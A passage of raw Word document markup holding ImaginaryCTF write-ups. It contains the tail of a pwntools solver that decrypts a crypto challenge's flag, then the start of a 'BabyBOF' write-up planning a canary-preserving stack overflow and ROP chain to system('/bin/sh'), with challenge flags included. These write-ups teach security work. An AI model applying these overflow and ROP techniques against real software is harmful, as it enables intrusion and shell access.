      <w:r w:rsidRPr="000D4C0E">
        <w:t xml:space="preserve">        line = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000D4C0E">
        <w:t>io.recvline</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000D4C0E">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000D4C0E">
        <w:t>).decode</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000D4C0E">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000D4C0E">
        <w:t>).strip</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000D4C0E">
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B9E5552" w14:textId="77777777" w:rsidR="000D4C0E" w:rsidRPr="000D4C0E" w:rsidRDefault="000D4C0E" w:rsidP="000D4C0E">
      <w:r w:rsidRPr="000D4C0E">
        <w:t xml:space="preserve">        if </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000D4C0E">
        <w:t>line.startswith</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000D4C0E">
        <w:t>("{"):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="143BF6C5" w14:textId="77777777" w:rsidR="000D4C0E" w:rsidRPr="000D4C0E" w:rsidRDefault="000D4C0E" w:rsidP="000D4C0E">
      <w:r w:rsidRPr="000D4C0E">
        <w:t xml:space="preserve">            return </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000D4C0E">
        <w:t>json.loads</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000D4C0E">
        <w:t>(line)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B769E16" w14:textId="77777777" w:rsidR="000D4C0E" w:rsidRPr="000D4C0E" w:rsidRDefault="000D4C0E" w:rsidP="000D4C0E"/>
    <w:p w14:paraId="709B8682" w14:textId="77777777" w:rsidR="000D4C0E" w:rsidRPr="000D4C0E" w:rsidRDefault="000D4C0E" w:rsidP="000D4C0E">
      <w:r w:rsidRPr="000D4C0E">
        <w:t xml:space="preserve">io = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000D4C0E">
        <w:t>remote(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000D4C0E">
        <w:t>HOST, PORT)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1984253C" w14:textId="77777777" w:rsidR="000D4C0E" w:rsidRPr="000D4C0E" w:rsidRDefault="000D4C0E" w:rsidP="000D4C0E"/>
    <w:p w14:paraId="7D9539F2" w14:textId="77777777" w:rsidR="000D4C0E" w:rsidRPr="000D4C0E" w:rsidRDefault="000D4C0E" w:rsidP="000D4C0E">
      <w:r w:rsidRPr="000D4C0E">
        <w:t># 1) Initial banner</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60DD003C" w14:textId="77777777" w:rsidR="000D4C0E" w:rsidRPr="000D4C0E" w:rsidRDefault="000D4C0E" w:rsidP="000D4C0E">
      <w:r w:rsidRPr="000D4C0E">
        <w:lastRenderedPageBreak/>
        <w:t>head = recv_json(io)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="195ED970" w14:textId="77777777" w:rsidR="000D4C0E" w:rsidRPr="000D4C0E" w:rsidRDefault="000D4C0E" w:rsidP="000D4C0E">
      <w:r w:rsidRPr="000D4C0E">
        <w:t>n = int(head["n"])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66C856C8" w14:textId="77777777" w:rsidR="000D4C0E" w:rsidRPr="000D4C0E" w:rsidRDefault="000D4C0E" w:rsidP="000D4C0E">
      <w:r w:rsidRPr="000D4C0E">
        <w:t>key_c = int(head["c"])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EB6203B" w14:textId="77777777" w:rsidR="000D4C0E" w:rsidRPr="000D4C0E" w:rsidRDefault="000D4C0E" w:rsidP="000D4C0E">
      <w:r w:rsidRPr="000D4C0E">
        <w:t xml:space="preserve">iv = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000D4C0E">
        <w:t>bytes.fromhex</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000D4C0E">
        <w:t>(head["iv"])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BFF4EA7" w14:textId="77777777" w:rsidR="000D4C0E" w:rsidRPr="000D4C0E" w:rsidRDefault="000D4C0E" w:rsidP="000D4C0E">
      <w:r w:rsidRPr="000D4C0E">
        <w:t xml:space="preserve">ct = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000D4C0E">
        <w:t>bytes.fromhex</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000D4C0E">
        <w:t>(head["ct"])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C7920A1" w14:textId="77777777" w:rsidR="000D4C0E" w:rsidRPr="000D4C0E" w:rsidRDefault="000D4C0E" w:rsidP="000D4C0E"/>
    <w:p w14:paraId="3DE590A9" w14:textId="77777777" w:rsidR="000D4C0E" w:rsidRPr="000D4C0E" w:rsidRDefault="000D4C0E" w:rsidP="000D4C0E">
      <w:r w:rsidRPr="000D4C0E">
        <w:t xml:space="preserve"># 2) Pick a safe </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000D4C0E">
        <w:t>ciphertext !</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000D4C0E">
        <w:t>= key_c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AEB8ADF" w14:textId="77777777" w:rsidR="000D4C0E" w:rsidRPr="000D4C0E" w:rsidRDefault="000D4C0E" w:rsidP="000D4C0E">
      <w:r w:rsidRPr="000D4C0E">
        <w:t xml:space="preserve">fixed_c = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000D4C0E">
        <w:t>pow(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000D4C0E">
        <w:t>2, E, n)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="293B60EF" w14:textId="77777777" w:rsidR="000D4C0E" w:rsidRPr="000D4C0E" w:rsidRDefault="000D4C0E" w:rsidP="000D4C0E">
      <w:r w:rsidRPr="000D4C0E">
        <w:t>if fixed_c == key_c:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66027515" w14:textId="77777777" w:rsidR="000D4C0E" w:rsidRPr="000D4C0E" w:rsidRDefault="000D4C0E" w:rsidP="000D4C0E">
      <w:r w:rsidRPr="000D4C0E">
        <w:t xml:space="preserve">    fixed_c = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000D4C0E">
        <w:t>pow(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000D4C0E">
        <w:t>3, E, n)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="075292AE" w14:textId="77777777" w:rsidR="000D4C0E" w:rsidRPr="000D4C0E" w:rsidRDefault="000D4C0E" w:rsidP="000D4C0E"/>
    <w:p w14:paraId="05D1CDD8" w14:textId="77777777" w:rsidR="000D4C0E" w:rsidRPr="000D4C0E" w:rsidRDefault="000D4C0E" w:rsidP="000D4C0E">
      <w:r w:rsidRPr="000D4C0E">
        <w:t># 3) Answer 1024 rounds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CD28686" w14:textId="77777777" w:rsidR="000D4C0E" w:rsidRPr="000D4C0E" w:rsidRDefault="000D4C0E" w:rsidP="000D4C0E">
      <w:r w:rsidRPr="000D4C0E">
        <w:t xml:space="preserve">for _ in </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000D4C0E">
        <w:t>range(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000D4C0E">
        <w:t>1024):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="137F9F38" w14:textId="77777777" w:rsidR="000D4C0E" w:rsidRPr="000D4C0E" w:rsidRDefault="000D4C0E" w:rsidP="000D4C0E">
      <w:r w:rsidRPr="000D4C0E">
        <w:t xml:space="preserve">    _ = recv_json(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000D4C0E">
        <w:t xml:space="preserve">io)   </w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000D4C0E">
        <w:t xml:space="preserve">                           # {"idx": k}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="220BE756" w14:textId="77777777" w:rsidR="000D4C0E" w:rsidRPr="000D4C0E" w:rsidRDefault="000D4C0E" w:rsidP="000D4C0E">
      <w:r w:rsidRPr="000D4C0E">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000D4C0E">
        <w:t>io.sendline</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000D4C0E">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000D4C0E">
        <w:t>json.dumps</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000D4C0E">
        <w:t>({"c": fixed_c}</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000D4C0E">
        <w:t>).encode</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000D4C0E">
        <w:t>())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DB6865D" w14:textId="77777777" w:rsidR="000D4C0E" w:rsidRPr="000D4C0E" w:rsidRDefault="000D4C0E" w:rsidP="000D4C0E">
      <w:r w:rsidRPr="000D4C0E">
        <w:t xml:space="preserve">    _ = recv_json(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000D4C0E">
        <w:t xml:space="preserve">io)   </w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000D4C0E">
        <w:t xml:space="preserve">                           # {"b": ...}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E4D7980" w14:textId="77777777" w:rsidR="000D4C0E" w:rsidRPr="000D4C0E" w:rsidRDefault="000D4C0E" w:rsidP="000D4C0E"/>
    <w:p w14:paraId="1D3AE391" w14:textId="77777777" w:rsidR="000D4C0E" w:rsidRPr="000D4C0E" w:rsidRDefault="000D4C0E" w:rsidP="000D4C0E">
      <w:r w:rsidRPr="000D4C0E">
        <w:t># 4) Get key_m from the final line</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7738F0C3" w14:textId="77777777" w:rsidR="000D4C0E" w:rsidRPr="000D4C0E" w:rsidRDefault="000D4C0E" w:rsidP="000D4C0E">
      <w:r w:rsidRPr="000D4C0E">
        <w:t>key_m = int(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000D4C0E">
        <w:t>io.recvline</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000D4C0E">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000D4C0E">
        <w:t>).decode</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000D4C0E">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000D4C0E">
        <w:t>).strip</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000D4C0E">
        <w:t>())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E7966CB" w14:textId="77777777" w:rsidR="000D4C0E" w:rsidRPr="000D4C0E" w:rsidRDefault="000D4C0E" w:rsidP="000D4C0E"/>
    <w:p w14:paraId="7269609F" w14:textId="77777777" w:rsidR="000D4C0E" w:rsidRPr="000D4C0E" w:rsidRDefault="000D4C0E" w:rsidP="000D4C0E">
      <w:r w:rsidRPr="000D4C0E">
        <w:t># 5) Derive AES key and decrypt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FAC9CA9" w14:textId="77777777" w:rsidR="000D4C0E" w:rsidRPr="000D4C0E" w:rsidRDefault="000D4C0E" w:rsidP="000D4C0E">
      <w:r w:rsidRPr="000D4C0E">
        <w:t>key = sha256(str(key_m</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000D4C0E">
        <w:t>).encode</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000D4C0E">
        <w:t>()</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000D4C0E">
        <w:t>).digest()[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000D4C0E">
        <w:t>:16]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C02E4A0" w14:textId="77777777" w:rsidR="000D4C0E" w:rsidRPr="000D4C0E" w:rsidRDefault="000D4C0E" w:rsidP="000D4C0E">
      <w:r w:rsidRPr="000D4C0E">
        <w:t xml:space="preserve">pt = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000D4C0E">
        <w:t>unpad(AES.new(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000D4C0E">
        <w:t>key, AES.MODE_CBC, iv=iv</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000D4C0E">
        <w:t>).decrypt</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000D4C0E">
        <w:t>(ct), 16)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="060990D1" w14:textId="77777777" w:rsidR="000D4C0E" w:rsidRPr="000D4C0E" w:rsidRDefault="000D4C0E" w:rsidP="000D4C0E">
      <w:r w:rsidRPr="000D4C0E">
        <w:t>print(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000D4C0E">
        <w:t>pt.decode</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000D4C0E">
        <w:t>())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3805485D" w14:textId="77777777" w:rsidR="000D4C0E" w:rsidRPr="000D4C0E" w:rsidRDefault="00000000" w:rsidP="000D4C0E">
      <w:r>
        <w:pict w14:anchorId="5F3617F7">
          <v:rect id="_x0000_i1039" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DB5F898" w14:textId="77777777" w:rsidR="000D4C0E" w:rsidRPr="000D4C0E" w:rsidRDefault="000D4C0E" w:rsidP="000D4C0E">
      <w:r w:rsidRPr="000D4C0E">
        <w:t>Result</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="090EACC6" w14:textId="77777777" w:rsidR="000D4C0E" w:rsidRPr="000D4C0E" w:rsidRDefault="000D4C0E" w:rsidP="000D4C0E">
      <w:r w:rsidRPr="000D4C0E">
        <w:t>Running the solver yields the decrypted flag:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1306DB55" w14:textId="77777777" w:rsidR="000D4C0E" w:rsidRPr="000D4C0E" w:rsidRDefault="000D4C0E" w:rsidP="000D4C0E">
      <w:r w:rsidRPr="000D4C0E">
        <w:t>ictf{p13cin9_7h3_b1t5_t0g37her_3f0068c1b9be2547ada52a8020420fb0}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39D41978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lastRenderedPageBreak/>
        <w:t>BabyBOF (ImaginaryCTF) — Write-up</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18E1E1D2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Overview</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CA0E4DF" w14:textId="77777777" w:rsidR="000D4C0E" w:rsidRPr="000D4C0E" w:rsidRDefault="000D4C0E" w:rsidP="000D4C0E">
      <w:r w:rsidRPr="000D4C0E">
        <w:t>Target: nc babybof.chal.imaginaryctf.org 1337</w:t>
      </w:r>
      <w:r w:rsidRPr="000D4C0E">
        <w:br/>
        <w:t>Flag: ictf{arent_challenges_written_two_hours_before_ctf_amazing}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3378FF9A" w14:textId="77777777" w:rsidR="000D4C0E" w:rsidRPr="000D4C0E" w:rsidRDefault="000D4C0E" w:rsidP="000D4C0E">
      <w:r w:rsidRPr="000D4C0E">
        <w:t xml:space="preserve">This “baby” </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000D4C0E">
        <w:t>pwn</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000D4C0E">
        <w:t xml:space="preserve"> prints everything you need: addresses for system, a pop rdi; ret gadget, a plain ret gadget, the location of "/bin/sh", and the stack canary. The input is read with an unsafe function, so we can overflow the stack, preserve the canary, and ROP into system("/bin/sh").</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43F28073" w14:textId="77777777" w:rsidR="000D4C0E" w:rsidRPr="000D4C0E" w:rsidRDefault="00000000" w:rsidP="000D4C0E">
      <w:r>
        <w:pict w14:anchorId="211098CF">
          <v:rect id="_x0000_i1040" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="49369CE2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Recon</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F2D7386" w14:textId="77777777" w:rsidR="000D4C0E" w:rsidRPr="000D4C0E" w:rsidRDefault="000D4C0E" w:rsidP="000D4C0E">
      <w:r w:rsidRPr="000D4C0E">
        <w:t>When you connect, the service leaks lines like:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DB5CB53" w14:textId="77777777" w:rsidR="000D4C0E" w:rsidRPr="000D4C0E" w:rsidRDefault="000D4C0E" w:rsidP="000D4C0E">
      <w:r w:rsidRPr="000D4C0E">
        <w:t>system @ 0x7e68...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6245FB5A" w14:textId="77777777" w:rsidR="000D4C0E" w:rsidRPr="000D4C0E" w:rsidRDefault="000D4C0E" w:rsidP="000D4C0E">
      <w:r w:rsidRPr="000D4C0E">
        <w:t>pop rdi; ret @ 0x4011ba</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31C8A17C" w14:textId="77777777" w:rsidR="000D4C0E" w:rsidRPr="000D4C0E" w:rsidRDefault="000D4C0E" w:rsidP="000D4C0E">
      <w:r w:rsidRPr="000D4C0E">
        <w:t>ret @ 0x401016</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78E7DA33" w14:textId="77777777" w:rsidR="000D4C0E" w:rsidRPr="000D4C0E" w:rsidRDefault="000D4C0E" w:rsidP="000D4C0E">
      <w:r w:rsidRPr="000D4C0E">
        <w:t>"/bin/sh" @ 0x404038</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71AAD3A8" w14:textId="77777777" w:rsidR="000D4C0E" w:rsidRPr="000D4C0E" w:rsidRDefault="000D4C0E" w:rsidP="000D4C0E">
      <w:r w:rsidRPr="000D4C0E">
        <w:t>canary: 0xe444cd86f13ffc00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4186BB0F" w14:textId="77777777" w:rsidR="000D4C0E" w:rsidRPr="000D4C0E" w:rsidRDefault="000D4C0E" w:rsidP="000D4C0E">
      <w:r w:rsidRPr="000D4C0E">
        <w:t>Give me your input:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68C2FEFF" w14:textId="77777777" w:rsidR="000D4C0E" w:rsidRPr="000D4C0E" w:rsidRDefault="000D4C0E" w:rsidP="000D4C0E">
      <w:r w:rsidRPr="000D4C0E">
        <w:t>From reversing / quick testing:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BBD6098" w14:textId="77777777" w:rsidR="000D4C0E" w:rsidRPr="000D4C0E" w:rsidRDefault="000D4C0E" w:rsidP="000D4C0E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000D4C0E">
        <w:t xml:space="preserve">Buffer before canary: </w:t>
      </w:r>
      <w:r w:rsidRPr="000D4C0E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>56 bytes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B2F6688" w14:textId="77777777" w:rsidR="000D4C0E" w:rsidRPr="000D4C0E" w:rsidRDefault="000D4C0E" w:rsidP="000D4C0E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000D4C0E">
        <w:t>Stack layout: 56 bytes buf | 8-byte canary | 8-byte saved RBP | RIP…</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="747D5BE6" w14:textId="77777777" w:rsidR="000D4C0E" w:rsidRPr="000D4C0E" w:rsidRDefault="000D4C0E" w:rsidP="000D4C0E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000D4C0E">
        <w:t>NX on, but ROP is fine since we’re handed gadgets + libc ptrs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="083B875C" w14:textId="77777777" w:rsidR="000D4C0E" w:rsidRPr="000D4C0E" w:rsidRDefault="000D4C0E" w:rsidP="000D4C0E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000D4C0E">
        <w:t xml:space="preserve">PIE/ASLR irrelevant because addresses are </w:t>
      </w:r>
      <w:r w:rsidRPr="000D4C0E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>already leaked</w:t>
      </w:r>
      <w:r w:rsidRPr="000D4C0E">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EC49130" w14:textId="77777777" w:rsidR="000D4C0E" w:rsidRPr="000D4C0E" w:rsidRDefault="00000000" w:rsidP="000D4C0E">
      <w:r>
        <w:pict w14:anchorId="14C30356">
          <v:rect id="_x0000_i1041" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0602C432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Exploit plan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="332D590E" w14:textId="77777777" w:rsidR="000D4C0E" w:rsidRPr="000D4C0E" w:rsidRDefault="000D4C0E" w:rsidP="000D4C0E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000D4C0E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Keep the canary intact.</w:t>
      </w:r>
      <w:r w:rsidRPr="000D4C0E">
        <w:t xml:space="preserve"> Overwrite it with the exact leaked value.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DBE2BF9" w14:textId="77777777" w:rsidR="000D4C0E" w:rsidRPr="000D4C0E" w:rsidRDefault="000D4C0E" w:rsidP="000D4C0E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000D4C0E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Maintain stack alignment.</w:t>
      </w:r>
      <w:r w:rsidRPr="000D4C0E">
        <w:t xml:space="preserve"> Insert a single ret before pop rdi; ret to keep a 16-byte aligned stack per SysV ABI (some libc calls care).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33A9F102" w14:textId="77777777" w:rsidR="000D4C0E" w:rsidRPr="000D4C0E" w:rsidRDefault="000D4C0E" w:rsidP="000D4C0E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000D4C0E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Call system("/bin/sh").</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="198FB5D1" w14:textId="77777777" w:rsidR="000D4C0E" w:rsidRPr="000D4C0E" w:rsidRDefault="000D4C0E" w:rsidP="000D4C0E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000D4C0E">
        <w:t>pop rdi; ret → load "/bin/sh" into RDI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="393ECF78" w14:textId="77777777" w:rsidR="000D4C0E" w:rsidRPr="000D4C0E" w:rsidRDefault="000D4C0E" w:rsidP="000D4C0E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000D4C0E">
        <w:lastRenderedPageBreak/>
        <w:t>system address as leaked</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39A9FF71" w14:textId="77777777" w:rsidR="000D4C0E" w:rsidRPr="000D4C0E" w:rsidRDefault="000D4C0E" w:rsidP="000D4C0E">
      <w:r w:rsidRPr="000D4C0E">
        <w:t>Final ROP chain (after canary &amp; saved RBP):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49B96B84" w14:textId="77777777" w:rsidR="000D4C0E" w:rsidRPr="000D4C0E" w:rsidRDefault="000D4C0E" w:rsidP="000D4C0E">
      <w:r w:rsidRPr="000D4C0E">
        <w:t>ret</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="695E7C25" w14:textId="77777777" w:rsidR="000D4C0E" w:rsidRPr="000D4C0E" w:rsidRDefault="000D4C0E" w:rsidP="000D4C0E">
      <w:r w:rsidRPr="000D4C0E">
        <w:t xml:space="preserve">pop </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000D4C0E">
        <w:t>rdi ;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000D4C0E">
        <w:t xml:space="preserve"> ret</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68CD856F" w14:textId="77777777" w:rsidR="000D4C0E" w:rsidRPr="000D4C0E" w:rsidRDefault="000D4C0E" w:rsidP="000D4C0E">
      <w:r w:rsidRPr="000D4C0E">
        <w:t>"/bin/sh"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F84E60A" w14:textId="77777777" w:rsidR="000D4C0E" w:rsidRPr="000D4C0E" w:rsidRDefault="000D4C0E" w:rsidP="000D4C0E">
      <w:r w:rsidRPr="000D4C0E">
        <w:t>system</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1879EAFF" w14:textId="77777777" w:rsidR="000D4C0E" w:rsidRPr="000D4C0E" w:rsidRDefault="000D4C0E" w:rsidP="000D4C0E">
      <w:r w:rsidRPr="000D4C0E">
        <w:t>Payload layout:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1838F88E" w14:textId="77777777" w:rsidR="000D4C0E" w:rsidRPr="000D4C0E" w:rsidRDefault="000D4C0E" w:rsidP="000D4C0E">
      <w:r w:rsidRPr="000D4C0E">
        <w:t>"A" * 56</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CA410BD" w14:textId="77777777" w:rsidR="000D4C0E" w:rsidRPr="000D4C0E" w:rsidRDefault="000D4C0E" w:rsidP="000D4C0E">
      <w:r w:rsidRPr="000D4C0E">
        <w:t>+ p64(canary)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D23027F" w14:textId="77777777" w:rsidR="000D4C0E" w:rsidRPr="000D4C0E" w:rsidRDefault="000D4C0E" w:rsidP="000D4C0E">
      <w:r w:rsidRPr="000D4C0E">
        <w:t>+ "B" * 8              # saved RBP filler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="632381D3" w14:textId="77777777" w:rsidR="000D4C0E" w:rsidRPr="000D4C0E" w:rsidRDefault="000D4C0E" w:rsidP="000D4C0E">
      <w:r w:rsidRPr="000D4C0E">
        <w:t>+ p64(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000D4C0E">
        <w:t xml:space="preserve">ret)   </w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000D4C0E">
        <w:t xml:space="preserve">          # alignment</w:t>
      </w:r>
    </w:p>
